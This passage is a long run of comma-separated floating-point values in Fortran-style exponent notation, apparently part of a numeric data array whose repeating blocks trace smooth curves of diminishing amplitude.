-0.25982859e-01,
0.35297391e-02,
0.39938814e-02,
0.45724809e-02,
0.51651788e-02,
0.56997212e-02,
0.61313836e-02,
0.64464915e-02,
0.66571729e-02,
0.67870081e-02,
0.68575540e-02,
0.68832617e-02,
0.68728351e-02,
0.68318904e-02,
0.67646406e-02,
0.66746362e-02,
0.65650316e-02,
0.64386618e-02,
0.62980657e-02,
0.61454801e-02,
0.59827766e-02,
0.58114552e-02,
0.56327097e-02,
0.54474538e-02,
0.52563460e-02,
0.50598914e-02,
0.48585772e-02,
0.46528103e-02,
0.44429065e-02,
0.42291693e-02,
0.40119542e-02,
0.37917392e-02,
0.35690265e-02,
0.33443815e-02,
0.31186463e-02,
0.28926407e-02,
0.26670455e-02,
0.24426919e-02,
0.22205103e-02,
0.20012076e-02,
0.17854705e-02,
0.15739684e-02,
0.13671899e-02,
0.11654871e-02,
0.96899009e-03,
0.77774836e-03,
0.59148681e-03,
0.40965760e-03,
0.23145005e-03,
0.55848002e-04,
-0.11826525e-03,
-0.29229349e-03,
-0.46810537e-03,
-0.64812414e-03,
-0.83613564e-03,
-0.10385482e-02,
-0.12673559e-02,
-0.15453240e-02,
-0.19167364e-02,
-0.24653263e-02,
-0.33373679e-02,
-0.47518569e-02,
-0.69443211e-02,
-0.99710366e-02,
-0.13414696e-01,
-0.16345950e-01,
-0.17911386e-01,
-0.18145934e-01,
-0.17885052e-01,
-0.17836532e-01,
-0.18110715e-01,
-0.18532671e-01,
-0.18993681e-01,
-0.19508589e-01,
-0.20170461e-01,
-0.21185948e-01,
-0.22894341e-01,
-0.24724348e-01,
-0.24370475e-01,
-0.22268195e-01,
0.31942856e-02,
0.36158317e-02,
0.41410751e-02,
0.46785669e-02,
0.51624421e-02,
0.55519687e-02,
0.58347746e-02,
0.60220673e-02,
0.61355513e-02,
0.61951405e-02,
0.62143006e-02,
0.62012500e-02,
0.61613480e-02,
0.60985861e-02,
0.60162526e-02,
0.59171882e-02,
0.58038891e-02,
0.56785326e-02,
0.55429381e-02,
0.53985524e-02,
0.52465028e-02,
0.50876997e-02,
0.49228426e-02,
0.47523943e-02,
0.45767589e-02,
0.43963231e-02,
0.42114421e-02,
0.40224311e-02,
0.38296313e-02,
0.36334537e-02,
0.34343314e-02,
0.32326737e-02,
0.30291770e-02,
0.28245456e-02,
0.26194807e-02,
0.24146992e-02,
0.22109461e-02,
0.20089839e-02,
0.18095284e-02,
0.16132607e-02,
0.14207716e-02,
0.12325735e-02,
0.10491284e-02,
0.87066717e-03,
0.69715641e-03,
0.52842626e-03,
0.36394782e-03,
0.20294097e-03,
0.44450713e-04,
-0.11262445e-03,
-0.26963896e-03,
-0.42814302e-03,
-0.59004046e-03,
-0.75823971e-03,
-0.93725865e-03,
-0.11351963e-02,
-0.13674999e-02,
-0.16641312e-02,
-0.20829688e-02,
-0.27305069e-02,
-0.37841904e-02,
-0.54863039e-02,
-0.80432529e-02,
-0.11373957e-01,
-0.14846842e-01,
-0.17431933e-01,
-0.18471425e-01,
-0.18317387e-01,
-0.17884307e-01,
-0.17721877e-01,
-0.17807389e-01,
-0.17944368e-01,
-0.18038927e-01,
-0.18111341e-01,
-0.18263325e-01,
-0.18744303e-01,
-0.19931488e-01,
-0.21152221e-01,
-0.20258194e-01,
-0.18154927e-01,
0.28755944e-02,
0.32562227e-02,
0.37303183e-02,
0.42150859e-02,
0.46508745e-02,
0.50008302e-02,
0.52538323e-02,
0.54201568e-02,
0.55196281e-02,
0.55704820e-02,
0.55851364e-02,
0.55712480e-02,
0.55338335e-02,
0.54765893e-02,
0.54024858e-02,
0.53140409e-02,
0.52134213e-02,
0.51024402e-02,
0.49825548e-02,
0.48549226e-02,
0.47204504e-02,
0.45797881e-02,
0.44334051e-02,
0.42817341e-02,
0.41251029e-02,
0.39637811e-02,
0.37980722e-02,
0.36283240e-02,
0.34549329e-02,
0.32783179e-02,
0.30987991e-02,
0.29169142e-02,
0.27332988e-02,
0.25485274e-02,
0.23631887e-02,
0.21780862e-02,
0.19938366e-02,
0.18110086e-02,
0.16303621e-02,
0.14525431e-02,
0.12780537e-02,
0.11074701e-02,
0.94128802e-03,
0.77982916e-03,
0.62306761e-03,
0.47078525e-03,
0.32257999e-03,
0.17765176e-03,
0.35159428e-04,
-0.10600228e-03,
-0.24719909e-03,
-0.38967439e-03,
-0.53508411e-03,
-0.68561384e-03,
-0.84459153e-03,
-0.10175847e-02,
-0.12152690e-02,
-0.14582346e-02,
-0.17864328e-02,
-0.22758693e-02,
-0.30617819e-02,
-0.43552169e-02,
-0.64090681e-02,
-0.93599092e-02,
-0.12933343e-01,
-0.16276378e-01,
-0.18346461e-01,
-0.18781584e-01,
-0.18226096e-01,
-0.17576260e-01,
-0.17187940e-01,
-0.16925601e-01,
-0.16586989e-01,
-0.16100395e-01,
-0.15514784e-01,
-0.15000328e-01,
-0.14952605e-01,
-0.15897794e-01,
-0.17156484e-01,
-0.16811144e-01,
-0.16059641e-01,
0.25749404e-02,
0.29165992e-02,
0.33420587e-02,
0.37768418e-02,
0.41672788e-02,
0.44802395e-02,
0.47057904e-02,
0.48532858e-02,
0.49406979e-02,
0.49845842e-02,
0.49962578e-02,
0.49827271e-02,
0.49485951e-02,
0.48972480e-02,
0.48313839e-02,
0.47532097e-02,
0.46645310e-02,
0.45668236e-02,
0.44612922e-02,
0.43488974e-02,
0.42303428e-02,
0.41060960e-02,
0.39765178e-02,
0.38419361e-02,
0.37026398e-02,
0.35588457e-02,
0.34108032e-02,
0.32588942e-02,
0.31035459e-02,
0.29450748e-02,
0.27838917e-02,
0.26205610e-02,
0.24555970e-02,
0.22894754e-02,
0.21228124e-02,
0.19562438e-02,
0.17903824e-02,
0.16257121e-02,
0.14628675e-02,
0.13024764e-02,
0.11450466e-02,
0.99116936e-03,
0.84134901e-03,
0.69589523e-03,
0.55489980e-03,
0.41809730e-03,
0.28507152e-03,
0.15523843e-03,
0.27696389e-04,
-0.98706871e-04,
-0.22511023e-03,
-0.35272306e-03,
-0.48294108e-03,
-0.61748014e-03,
-0.75878931e-03,
-0.91083115e-03,
-0.10810896e-02,
-0.12839842e-02,
-0.15473457e-02,
-0.19251802e-02,
-0.25176301e-02,
-0.34943304e-02,
-0.50974879e-02,
-0.75646825e-02,
-0.10904021e-01,
-0.14594574e-01,
-0.17590806e-01,
-0.18962247e-01,
-0.18717308e-01,
-0.17718159e-01,
-0.16742069e-01,
-0.15938997e-01,
-0.15096456e-01,
-0.14041902e-01,
-0.12778138e-01,
-0.11481387e-01,
-0.10537255e-01,
-0.10632942e-01,
-0.12457354e-01,
-0.15134930e-01,
-0.16634356e-01,
-0.17927606e-01,
0.22929932e-02,
0.25978240e-02,
0.29773721e-02,
0.33650806e-02,
0.37129789e-02,
0.39914814e-02,
0.41917670e-02,
0.43222816e-02,
0.43991888e-02,
0.44373926e-02,
0.44470965e-02,
0.44346289e-02,
0.44041476e-02,
0.43587163e-02,
0.43007480e-02,
0.42321626e-02,
0.41544731e-02,
0.40688911e-02,
0.39764121e-02,
0.38778088e-02,
0.37736101e-02,
0.36642191e-02,
0.35499295e-02,
0.34309430e-02,
0.33074785e-02,
0.31797730e-02,
0.30480758e-02,
0.29127430e-02,
0.27741243e-02,
0.26325521e-02,
0.24885421e-02,
0.23425936e-02,
0.21950973e-02,
0.20465283e-02,
0.18974531e-02,
0.17483715e-02,
0.15998175e-02,
0.14523078e-02,
0.13063080e-02,
0.11623653e-02,
0.10211229e-02,
0.88305573e-03,
0.74868003e-03,
0.61835541e-03,
0.49214705e-03,
0.36987942e-03,
0.25109114e-03,
0.13533220e-03,
0.21703247e-04,
-0.90926857e-04,
-0.20352546e-03,
-0.31733362e-03,
-0.43350609e-03,
-0.55338885e-03,
-0.67877601e-03,
-0.81268302e-03,
-0.96038845e-03,
-0.11320858e-02,
-0.13475646e-02,
-0.16453972e-02,
-0.20989443e-02,
-0.28392603e-02,
-0.40741763e-02,
-0.60647582e-02,
-0.89876316e-02,
-0.12647802e-01,
-0.16243244e-01,
-0.18616004e-01,
-0.19093577e-01,
-0.18077876e-01,
-0.16530357e-01,
-0.15029374e-01,
-0.13550565e-01,
-0.11885053e-01,
-0.99943755e-02,
-0.81011895e-02,
-0.66745249e-02,
-0.64049885e-02,
-0.81325630e-02,
-0.12245839e-01,
-0.17089149e-01,
-0.20167973e-01,
-0.22245478e-01,
0.20299123e-02,
0.23001628e-02,
0.26366366e-02,
0.29802567e-02,
0.32884392e-02,
0.35349382e-02,
0.37119628e-02,
0.38270687e-02,
0.38946737e-02,
0.39280793e-02,
0.39364123e-02,
0.39253496e-02,
0.38986101e-02,
0.38588869e-02,
0.38082711e-02,
0.37484372e-02,
0.36807158e-02,
0.36061385e-02,
0.35254795e-02,
0.34393084e-02,
0.33480865e-02,
0.32521591e-02,
0.31517555e-02,
0.30470104e-02,
0.29380592e-02,
0.28251486e-02,
0.27085962e-02,
0.25886497e-02,
0.24655664e-02,
0.23397931e-02,
0.22118504e-02,
0.20821332e-02,
0.19509925e-02,
0.18189276e-02,
0.16863818e-02,
0.15537632e-02,
0.14214842e-02,
0.12901434e-02,
0.11600459e-02,
0.10316600e-02,
0.90566400e-03,
0.78258343e-03,
0.66282053e-03,
0.54670696e-03,
0.43438902e-03,
0.32569954e-03,
0.22029619e-03,
0.11765160e-03,
0.16918209e-04,
-0.82841863e-04,
-0.18264857e-03,
-0.28356965e-03,
-0.38668749e-03,
-0.49303711e-03,
-0.60395780e-03,
-0.72176283e-03,
-0.85029344e-03,
-0.99679129e-03,
-0.11756377e-02,
-0.14147292e-02,
-0.17678216e-02,
-0.23343621e-02,
-0.32830362e-02,
-0.48576673e-02,
-0.73089227e-02,
-0.10680980e-01,
-0.14495158e-01,
-0.17674342e-01,
-0.19089572e-01,
-0.18462013e-01,
-0.16541397e-01,
-0.14258571e-01,
-0.11979854e-01,
-0.96273897e-02,
-0.71729873e-02,
-0.49013551e-02,
-0.33841925e-02,
-0.33057944e-02,
-0.52674399e-02,
-0.96266540e-02,
-0.15894135e-01,
-0.21601008e-01,
-0.24401912e-01,
-0.25605565e-01,
0.17854190e-02,
0.20233756e-02,
0.23196433e-02,
0.26221615e-02,
0.28933994e-02,
0.31102363e-02,
0.32658295e-02,
0.33668731e-02,
0.34261208e-02,
0.34553525e-02,
0.34626699e-02,
0.34531134e-02,
0.34299616e-02,
0.33955548e-02,
0.33516849e-02,
0.32997937e-02,
0.32410624e-02,
0.31763858e-02,
0.31063606e-02,
0.30314266e-02,
0.29519610e-02,
0.28682463e-02,
0.27804545e-02,
0.26887048e-02,
0.25930938e-02,
0.24938518e-02,
0.23912911e-02,
0.22855958e-02,
0.21769952e-02,
0.20659990e-02,
0.19530528e-02,
0.18384572e-02,
0.17226556e-02,
0.16060474e-02,
0.14889956e-02,
0.13717994e-02,
0.12548816e-02,
0.11386774e-02,
0.10235143e-02,
0.90985751e-03,
0.79824886e-03,
0.68927044e-03,
0.58327196e-03,
0.48052520e-03,
0.38123387e-03,
0.28524606e-03,
0.19232801e-03,
0.10188403e-03,
0.13148935e-04,
-0.74649892e-04,
-0.16256304e-03,
-0.25152223e-03,
-0.34248683e-03,
-0.43625894e-03,
-0.53394295e-03,
-0.63723064e-03,
-0.74901024e-03,
-0.87452604e-03,
-0.10243639e-02,
-0.12190320e-02,
-0.14982653e-02,
-0.19371029e-02,
-0.26686641e-02,
-0.39032472e-02,
-0.59056627e-02,
-0.88597359e-02,
-0.12578117e-01,
-0.16234819e-01,
-0.18552493e-01,
-0.18625131e-01,
-0.16659645e-01,
-0.13658211e-01,
-0.10453119e-01,
-0.73239915e-02,
-0.43831225e-02,
-0.19895632e-02,
-0.75665663e-03,
-0.12641177e-02,
-0.37606840e-02,
-0.81160162e-02,
-0.14009449e-01,
-0.20516826e-01,
-0.25252979e-01,
-0.26749684e-01,
-0.26949666e-01,
0.15589494e-02,
0.17668876e-02,
0.20257886e-02,
0.22901346e-02,
0.25271075e-02,
0.27164973e-02,
0.28523379e-02,
0.29405085e-02,
0.29921937e-02,
0.30177287e-02,
0.30242268e-02,
0.30161096e-02,
0.29962433e-02,
0.29666633e-02,
0.29289203e-02,
0.28842422e-02,
0.28336111e-02,
0.27777818e-02,
0.27172987e-02,
0.26525310e-02,
0.25837307e-02,
0.25110987e-02,
0.24347827e-02,
0.23548861e-02,
0.22715516e-02,
0.21849549e-02,
0.20953005e-02,
0.20027831e-02,
0.19077143e-02,
0.18105077e-02,
0.17114856e-02,
0.16110209e-02,
0.15095366e-02,
0.14073697e-02,
0.13047857e-02,
0.12020444e-02,
0.10995269e-02,
0.99746429e-03,
0.89634967e-03,
0.79651998e-03,
0.69846597e-03,
0.60272694e-03,
0.50964806e-03,
0.41947985e-03,
0.33230876e-03,
0.24821598e-03,
0.16693448e-03,
0.87793873e-04,
0.10210203e-04,
-0.66529035e-04,
-0.14337612e-03,
-0.22124445e-03,
-0.30088221e-03,
-0.38298120e-03,
-0.46846602e-03,
-0.55856747e-03,
-0.65543054e-03,
-0.76301250e-03,
-0.88915287e-03,
-0.10492229e-02,
-0.12729177e-02,
-0.16169698e-02,
-0.21851282e-02,
-0.31512871e-02,
-0.47627124e-02,
-0.72655436e-02,
-0.10682470e-01,
-0.14481976e-01,
-0.17479382e-01,
-0.18369909e-01,
-0.16695704e-01,
-0.13192192e-01,
-0.90477718e-02,
-0.50837407e-02,
-0.17456600e-02,
0.50775765e-03,
0.11405456e-02,
-0.15771549e-03,
-0.32012013e-02,
-0.74220751e-02,
-0.12348277e-01,
-0.17880509e-01,
-0.23407269e-01,
-0.26902754e-01,
-0.27527036e-01,
-0.27351677e-01,
0.13498098e-02,
0.15299571e-02,
0.17542662e-02,
0.19832880e-02,
0.21885794e-02,
0.23526303e-02,
0.24702842e-02,
0.25466559e-02,
0.25914581e-02,
0.26136602e-02,
0.26194309e-02,
0.26126066e-02,
0.25956824e-02,
0.25704356e-02,
0.25382130e-02,
0.25000437e-02,
0.24567009e-02,
0.24088090e-02,
0.23568932e-02,
0.23012925e-02,
0.22421621e-02,
0.21796003e-02,
0.21137316e-02,
0.20446836e-02,
0.19726283e-02,
0.18976876e-02,
0.18199275e-02,
0.17396152e-02,
0.16571450e-02,
0.15727388e-02,
0.14866672e-02,
0.13993700e-02,
0.13112020e-02,
0.12224860e-02,
0.11333575e-02,
0.10441266e-02,
0.95500512e-03,
0.86619117e-03,
0.77818817e-03,
0.69130980e-03,
0.60596765e-03,
0.52263023e-03,
0.44163744e-03,
0.36320378e-03,
0.28736555e-03,
0.21433813e-03,
0.14382407e-03,
0.75184740e-04,
0.79467936e-05,
-0.58581456e-04,
-0.12522114e-03,
-0.19278513e-03,
-0.26187330e-03,
-0.33317646e-03,
-0.40739289e-03,
-0.48542794e-03,
-0.56885718e-03,
-0.66080934e-03,
-0.76709641e-03,
-0.89942804e-03,
-0.10802879e-02,
-0.13528165e-02,
-0.17975677e-02,
-0.25551619e-02,
-0.38419224e-02,
-0.59169503e-02,
-0.89288345e-02,
-0.12605214e-01,
-0.15980633e-01,
-0.17610485e-01,
-0.16458714e-01,
-0.12757922e-01,
-0.78148004e-02,
-0.30447829e-02,
0.58803929e-03,
0.24830827e-02,
0.23169408e-02,
0.21695795e-03,
-0.31757678e-02,
-0.70471163e-02,
-0.10940184e-01,
-0.15055859e-01,
-0.19874115e-01,
-0.24761699e-01,
-0.27603908e-01,
-0.27851652e-01,
-0.27539870e-01,
0.11573090e-02,
0.13118297e-02,
0.15042420e-02,
0.17007013e-02,
0.18768052e-02,
0.20175355e-02,
0.21184757e-02,
0.21840241e-02,
0.22225198e-02,
0.22416625e-02,
0.22467452e-02,
0.22410604e-02,
0.22267597e-02,
0.22053893e-02,
0.21781034e-02,
0.21457481e-02,
0.21089534e-02,
0.20682334e-02,
0.20240291e-02,
0.19766658e-02,
0.19262728e-02,
0.18728701e-02,
0.18165240e-02,
0.17574138e-02,
0.16956952e-02,
0.16314362e-02,
0.15646521e-02,
0.14956590e-02,
0.14248277e-02,
0.13522609e-02,
0.12782239e-02,
0.12031234e-02,
0.11273304e-02,
0.10510463e-02,
0.97442413e-03,
0.89773658e-03,
0.82104641e-03,
0.74460293e-03,
0.66874258e-03,
0.59397513e-03,
0.52050536e-03,
0.44870362e-03,
0.37896109e-03,
0.31140892e-03,
0.24619559e-03,
0.18341106e-03,
0.12278830e-03,
0.63891501e-04,
0.61988922e-05,
-0.50909595e-04,
-0.10814507e-03,
-0.16616660e-03,
-0.22550514e-03,
-0.28680690e-03,
-0.35062019e-03,
-0.41758217e-03,
-0.48887444e-03,
-0.56698389e-03,
-0.65631996e-03,
-0.76583039e-03,
-0.91279822e-03,
-0.11302640e-02,
-0.14807846e-02,
-0.20767434e-02,
-0.31004245e-02,
-0.47965096e-02,
-0.73740366e-02,
-0.10751202e-01,
-0.14214644e-01,
-0.16375747e-01,
-0.15823588e-01,
-0.12226088e-01,
-0.67599509e-02,
-0.13356704e-02,
0.24713113e-02,
0.38747264e-02,
0.28679580e-02,
0.11903104e-03,
-0.33430753e-02,
-0.66695027e-02,
-0.96058799e-02,
-0.12532249e-01,
-0.16198792e-01,
-0.21001449e-01,
-0.25733067e-01,
-0.28118331e-01,
-0.27977712e-01,
-0.27381005e-01,
0.98083925e-03,
0.11118341e-02,
0.12749631e-02,
0.14415317e-02,
0.15908498e-02,
0.17101859e-02,
0.17957988e-02,
0.18514196e-02,
0.18841210e-02,
0.19004331e-02,
0.19048484e-02,
0.19001653e-02,
0.18882133e-02,
0.18703013e-02,
0.18473966e-02,
0.18202132e-02,
0.17892951e-02,
0.17550559e-02,
0.17178158e-02,
0.16778519e-02,
0.16353233e-02,
0.15902224e-02,
0.15425772e-02,
0.14925570e-02,
0.14402777e-02,
0.13857534e-02,
0.13290886e-02,
0.12705566e-02,
0.12104037e-02,
0.11487597e-02,
0.10858473e-02,
0.10220249e-02,
0.95764559e-03,
0.89280307e-03,
0.82777342e-03,
0.76263881e-03,
0.69743692e-03,
0.63244364e-03,
0.56787435e-03,
0.50428713e-03,
0.44183279e-03,
0.38074178e-03,
0.32141685e-03,
0.26393912e-03,
0.20854473e-03,
0.15521001e-03,
0.10369664e-03,
0.53771990e-04,
0.48405859e-05,
-0.43625452e-04,
-0.92199283e-04,
-0.14142317e-03,
-0.19180843e-03,
-0.24387297e-03,
-0.29810442e-03,
-0.35491036e-03,
-0.41522519e-03,
-0.48093690e-03,
-0.55558363e-03,
-0.64595538e-03,
-0.76544558e-03,
-0.93956996e-03,
-0.12170107e-02,
-0.16869402e-02,
-0.24994221e-02,
-0.38717622e-02,
-0.60297726e-02,
-0.90123136e-02,
-0.12333807e-01,
-0.14771741e-01,
-0.14760138e-01,
-0.11492035e-01,
-0.58502830e-02,
-0.39222432e-04,
0.38003121e-02,
0.46805777e-02,
0.29477894e-02,
-0.19698367e-03,
-0.34707133e-02,
-0.61565377e-02,
-0.82763545e-02,
-0.10341127e-01,
-0.13046334e-01,
-0.17025929e-01,
-0.22158746e-01,
-0.26648698e-01,
-0.28339002e-01,
-0.27549669e-01,
-0.26395839e-01,
0.81985246e-03,
0.92936639e-03,
0.10657535e-02,
0.12050235e-02,
0.13298774e-02,
0.14296711e-02,
0.15012774e-02,
0.15478174e-02,
0.15752059e-02,
0.15889057e-02,
0.15926794e-02,
0.15888754e-02,
0.15790189e-02,
0.15641790e-02,
0.15451561e-02,
0.15225782e-02,
0.14969195e-02,
0.14685052e-02,
0.14375511e-02,
0.14042476e-02,
0.13687719e-02,
0.13311717e-02,
0.12914606e-02,
0.12497153e-02,
0.12060066e-02,
0.11603512e-02,
0.11129703e-02,
0.10640363e-02,
0.10136392e-02,
0.96200767e-03,
0.90932270e-03,
0.85588358e-03,
0.80193224e-03,
0.74761838e-03,
0.69321913e-03,
0.63866674e-03,
0.58403739e-03,
0.52954548e-03,
0.47544795e-03,
0.42208337e-03,
0.36977371e-03,
0.31858659e-03,
0.26881197e-03,
0.22063967e-03,
0.17424425e-03,
0.12957763e-03,
0.86436587e-04,
0.44699889e-04,
0.37974135e-05,
-0.36786892e-04,
-0.77447279e-04,
-0.11859972e-03,
-0.16077398e-03,
-0.20438076e-03,
-0.24981576e-03,
-0.29733716e-03,
-0.34771886e-03,
-0.40232454e-03,
-0.46408881e-03,
-0.53816853e-03,
-0.63491607e-03,
-0.77419216e-03,
-0.99393132e-03,
-0.13644308e-02,
-0.20072565e-02,
-0.31077981e-02,
-0.48824749e-02,
-0.74348073e-02,
-0.10457132e-01,
-0.12935034e-01,
-0.13322859e-01,
-0.10510216e-01,
-0.50372370e-02,
0.82519592e-03,
0.45412472e-02,
0.49564531e-02,
0.27259453e-02,
-0.53395459e-03,
-0.34414190e-02,
-0.54976437e-02,
-0.69722342e-02,
-0.84393835e-02,
-0.10464143e-01,
-0.13568074e-01,
-0.18088147e-01,
-0.23360549e-01,
-0.27191006e-01,
-0.27798105e-01,
-0.26014257e-01,
-0.23941122e-01,
0.67388569e-03,
0.76391455e-03,
0.87603967e-03,
0.99053816e-03,
0.10931880e-02,
0.11752385e-02,
0.12341201e-02,
0.12724005e-02,
0.12949465e-02,
0.13062552e-02,
0.13094257e-02,
0.13063867e-02,
0.12983767e-02,
0.12862559e-02,
0.12706857e-02,
0.12522101e-02,
0.12312382e-02,
0.12080271e-02,
0.11827156e-02,
0.11554065e-02,
0.11262480e-02,
0.10953922e-02,
0.10628636e-02,
0.10286153e-02,
0.99264085e-03,
0.95504802e-03,
0.91611175e-03,
0.87590015e-03,
0.83438883e-03,
0.79185999e-03,
0.74851344e-03,
0.70453959e-03,
0.66006870e-03,
0.61538786e-03,
0.57062833e-03,
0.52572385e-03,
0.48075779e-03,
0.43583699e-03,
0.39130700e-03,
0.34728937e-03,
0.30423937e-03,
0.26211512e-03,
0.22102211e-03,
0.18136523e-03,
0.14320243e-03,
0.10641267e-03,
0.70891205e-04,
0.36568774e-04,
0.29850753e-05,
-0.30428575e-04,
-0.63911211e-04,
-0.97726115e-04,
-0.13241505e-03,
-0.16834371e-03,
-0.20574214e-03,
-0.24483376e-03,
-0.28623073e-03,
-0.33093616e-03,
-0.38131754e-03,
-0.44136596e-03,
-0.51900127e-03,
-0.62973931e-03,
-0.80306787e-03,
-0.10939565e-02,
-0.15995824e-02,
-0.24733264e-02,
-0.39081872e-02,
-0.60330946e-02,
-0.86653326e-02,
-0.10997782e-01,
-0.11619342e-01,
-0.93000261e-02,
-0.42796796e-02,
0.12966705e-02,
0.47367909e-02,
0.48012077e-02,
0.23494719e-02,
-0.77558518e-03,
-0.32301398e-02,
-0.47397721e-02,
-0.57379329e-02,
-0.67931442e-02,
-0.83390176e-02,
-0.10730988e-01,
-0.14351542e-01,
-0.19255424e-01,
-0.24215246e-01,
-0.26824960e-01,
-0.25858946e-01,
-0.22609137e-01,
-0.19117815e-01,
0.54258847e-03,
0.61508559e-03,
0.70537691e-03,
0.79757918e-03,
0.88023918e-03,
0.94631047e-03,
0.99372561e-03,
0.10245563e-02,
0.10427287e-02,
0.10518713e-02,
0.10544811e-02,
0.10520979e-02,
0.10457006e-02,
0.10359808e-02,
0.10234818e-02,
0.10086508e-02,
0.99183375e-03,
0.97323948e-03,
0.95295400e-03,
0.93100907e-03,
0.90750493e-03,
0.88267523e-03,
0.85658359e-03,
0.82906929e-03,
0.80003683e-03,
0.76972524e-03,
0.73839410e-03,
0.70602290e-03,
0.67255105e-03,
0.63823280e-03,
0.60333178e-03,
0.56789321e-03,
0.53199811e-03,
0.49601536e-03,
0.45993822e-03,
0.42375299e-03,
0.38750842e-03,
0.35126708e-03,
0.31534981e-03,
0.27984436e-03,
0.24513889e-03,
0.21121174e-03,
0.17798673e-03,
0.14601613e-03,
0.11531570e-03,
0.85622109e-04,
0.56977922e-04,
0.29328881e-04,
0.23219493e-05,
-0.24609051e-04,
-0.51613693e-04,
-0.78829580e-04,
-0.10677023e-03,
-0.13576847e-03,
-0.16589028e-03,
-0.19740456e-03,
-0.23071076e-03,
-0.26662330e-03,
-0.30694614e-03,
-0.35483547e-03,
-0.41624482e-03,
-0.50326047e-03,
-0.63863368e-03,
-0.86484943e-03,
-0.12584554e-02,
-0.19429043e-02,
-0.30815345e-02,
-0.48037078e-02,
-0.70073316e-02,
-0.90698786e-02,
-0.97764749e-02,
-0.79293735e-02,
-0.35561759e-02,
0.14528841e-02,
0.44905520e-02,
0.43353909e-02,
0.19235054e-02,
-0.88058808e-03,
-0.28684181e-02,
-0.39436910e-02,
-0.46082577e-02,
-0.53751953e-02,
-0.65655066e-02,
-0.84049981e-02,
-0.11191580e-01,
-0.15233751e-01,
-0.20167785e-01,
-0.24146404e-01,
-0.24793619e-01,
-0.21611178e-01,
-0.16357245e-01,
-0.11137053e-01,
0.42571200e-03,
0.48259774e-03,
0.55344484e-03,
0.62578957e-03,
0.69064385e-03,
0.74247847e-03,
0.77967369e-03,
0.80386118e-03,
0.81812969e-03,
0.82533201e-03,
0.82742231e-03,
0.82559290e-03,
0.82059979e-03,
0.81299205e-03,
0.80320571e-03,
0.79159206e-03,
0.77843288e-03,
0.76390296e-03,
0.74805156e-03,
0.73085778e-03,
0.71239163e-03,
0.69290656e-03,
0.67251193e-03,
0.65096776e-03,
0.62812673e-03,
0.60432340e-03,
0.57976606e-03,
0.55436889e-03,
0.52808766e-03,
0.50110236e-03,
0.47373594e-03,
0.44590727e-03,
0.41769189e-03,
0.38944930e-03,
0.36113514e-03,
0.33273242e-03,
0.30424978e-03,
0.27580233e-03,
0.24755922e-03,
0.21969499e-03,
0.19240828e-03,
0.16580452e-03,
0.13966703e-03,
0.11454133e-03,
0.90488385e-04,
0.67134846e-04,
0.44648674e-04,
0.22957218e-04,
0.17676108e-05,
-0.19375148e-04,
-0.40583618e-04,
-0.61928760e-04,
-0.83859930e-04,
-0.10665116e-03,
-0.13027368e-03,
-0.15504849e-03,
-0.18114736e-03,
-0.20928915e-03,
-0.24077985e-03,
-0.27812496e-03,
-0.32568991e-03,
-0.39278640e-03,
-0.49672712e-03,
-0.66978729e-03,
-0.97107701e-03,
-0.14971532e-02,
-0.23801890e-02,
-0.37356641e-02,
-0.55097779e-02,
-0.72345133e-02,
-0.79152975e-02,
-0.64894208e-02,
-0.28653429e-02,
0.13867198e-02,
0.39382749e-02,
0.36805528e-02,
0.15104047e-02,
-0.85980649e-03,
-0.24118538e-02,
-0.31621221e-02,
-0.36013129e-02,
-0.41603735e-02,
-0.50707515e-02,
-0.64725522e-02,
-0.85721835e-02,
-0.11695998e-01,
-0.15934667e-01,
-0.20252047e-01,
-0.22257976e-01,
-0.20039089e-01,
-0.14158701e-01,
-0.70773158e-02,
-0.11583769e-02,
0.32308648e-03,
0.36626059e-03,
0.42002957e-03,
0.47493313e-03,
0.52414869e-03,
0.56347938e-03,
0.59169793e-03,
0.61004912e-03,
0.62088534e-03,
0.62637340e-03,
0.62798650e-03,
0.62661694e-03,
0.62283722e-03,
0.61707193e-03,
0.60965854e-03,
0.60086075e-03,
0.59088779e-03,
0.57988992e-03,
0.56789967e-03,
0.55486214e-03,
0.54083182e-03,
0.52603544e-03,
0.51060918e-03,
0.49428100e-03,
0.47690922e-03,
0.45883877e-03,
0.44021819e-03,
0.42093766e-03,
0.40098530e-03,
0.38046407e-03,
0.35971330e-03,
0.33858226e-03,
0.31714686e-03,
0.29569783e-03,
0.27421847e-03,
0.25265093e-03,
0.23099354e-03,
0.20943003e-03,
0.18794239e-03,
0.16680970e-03,
0.14604363e-03,
0.12587215e-03,
0.10602640e-03,
0.86910019e-04,
0.68677633e-04,
0.50912015e-04,
0.33862842e-04,
0.17410162e-04,
0.13113118e-05,
-0.14745443e-04,
-0.30839601e-04,
-0.47037924e-04,
-0.63687643e-04,
-0.81004437e-04,
-0.98914243e-04,
-0.11776508e-03,
-0.13753906e-03,
-0.15888251e-03,
-0.18270283e-03,
-0.21094215e-03,
-0.24672056e-03,
-0.29703090e-03,
-0.37476781e-03,
-0.50383923e-03,
-0.72860206e-03,
-0.11220841e-02,
-0.17865424e-02,
-0.28166992e-02,
-0.41856705e-02,
-0.55507738e-02,
-0.61370027e-02,
-0.50718379e-02,
-0.22190376e-02,
0.11870584e-02,
0.32180531e-02,
0.29439172e-02,
0.11399792e-02,
-0.75004215e-03,
-0.19179990e-02,
-0.24332437e-02,
-0.27225760e-02,
-0.31262944e-02,
-0.38075345e-02,
-0.48529524e-02,
-0.64000175e-02,
-0.87149860e-02,
-0.12041125e-01,
-0.15928924e-01,
-0.18521670e-01,
-0.17406538e-01,
-0.11980806e-01,
-0.43471926e-02,
0.24430454e-02,
0.64657470e-02,
0.23461202e-03,
0.26596323e-03,
0.30500707e-03,
0.34487346e-03,
0.38060735e-03,
0.40916057e-03,
0.42964329e-03,
0.44296391e-03,
0.45083603e-03,
0.45483361e-03,
0.45601939e-03,
0.45503493e-03,
0.45229631e-03,
0.44811305e-03,
0.44273314e-03,
0.43635038e-03,
0.42911444e-03,
0.42114657e-03,
0.41246001e-03,
0.40299704e-03,
0.39280354e-03,
0.38204770e-03,
0.37087622e-03,
0.35903638e-03,
0.34639766e-03,
0.33326566e-03,
0.31975409e-03,
0.30575541e-03,
0.29127134e-03,
0.27634719e-03,
0.26128866e-03,
0.24593511e-03,
0.23035664e-03,
0.21476793e-03,
0.19919084e-03,
0.18352638e-03,
0.16776577e-03,
0.15213400e-03,
0.13650597e-03,
0.12117127e-03,
0.10604783e-03,
0.91420814e-04,
0.77014876e-04,
0.63102707e-04,
0.49865157e-04,
0.36943147e-04,
0.24579298e-04,
0.12646942e-04,
0.93583714e-06,
-0.10726711e-04,
-0.22409520e-04,
-0.34169330e-04,
-0.46268411e-04,
-0.58847447e-04,
-0.71843184e-04,
-0.85561762e-04,
-0.99899378e-04,
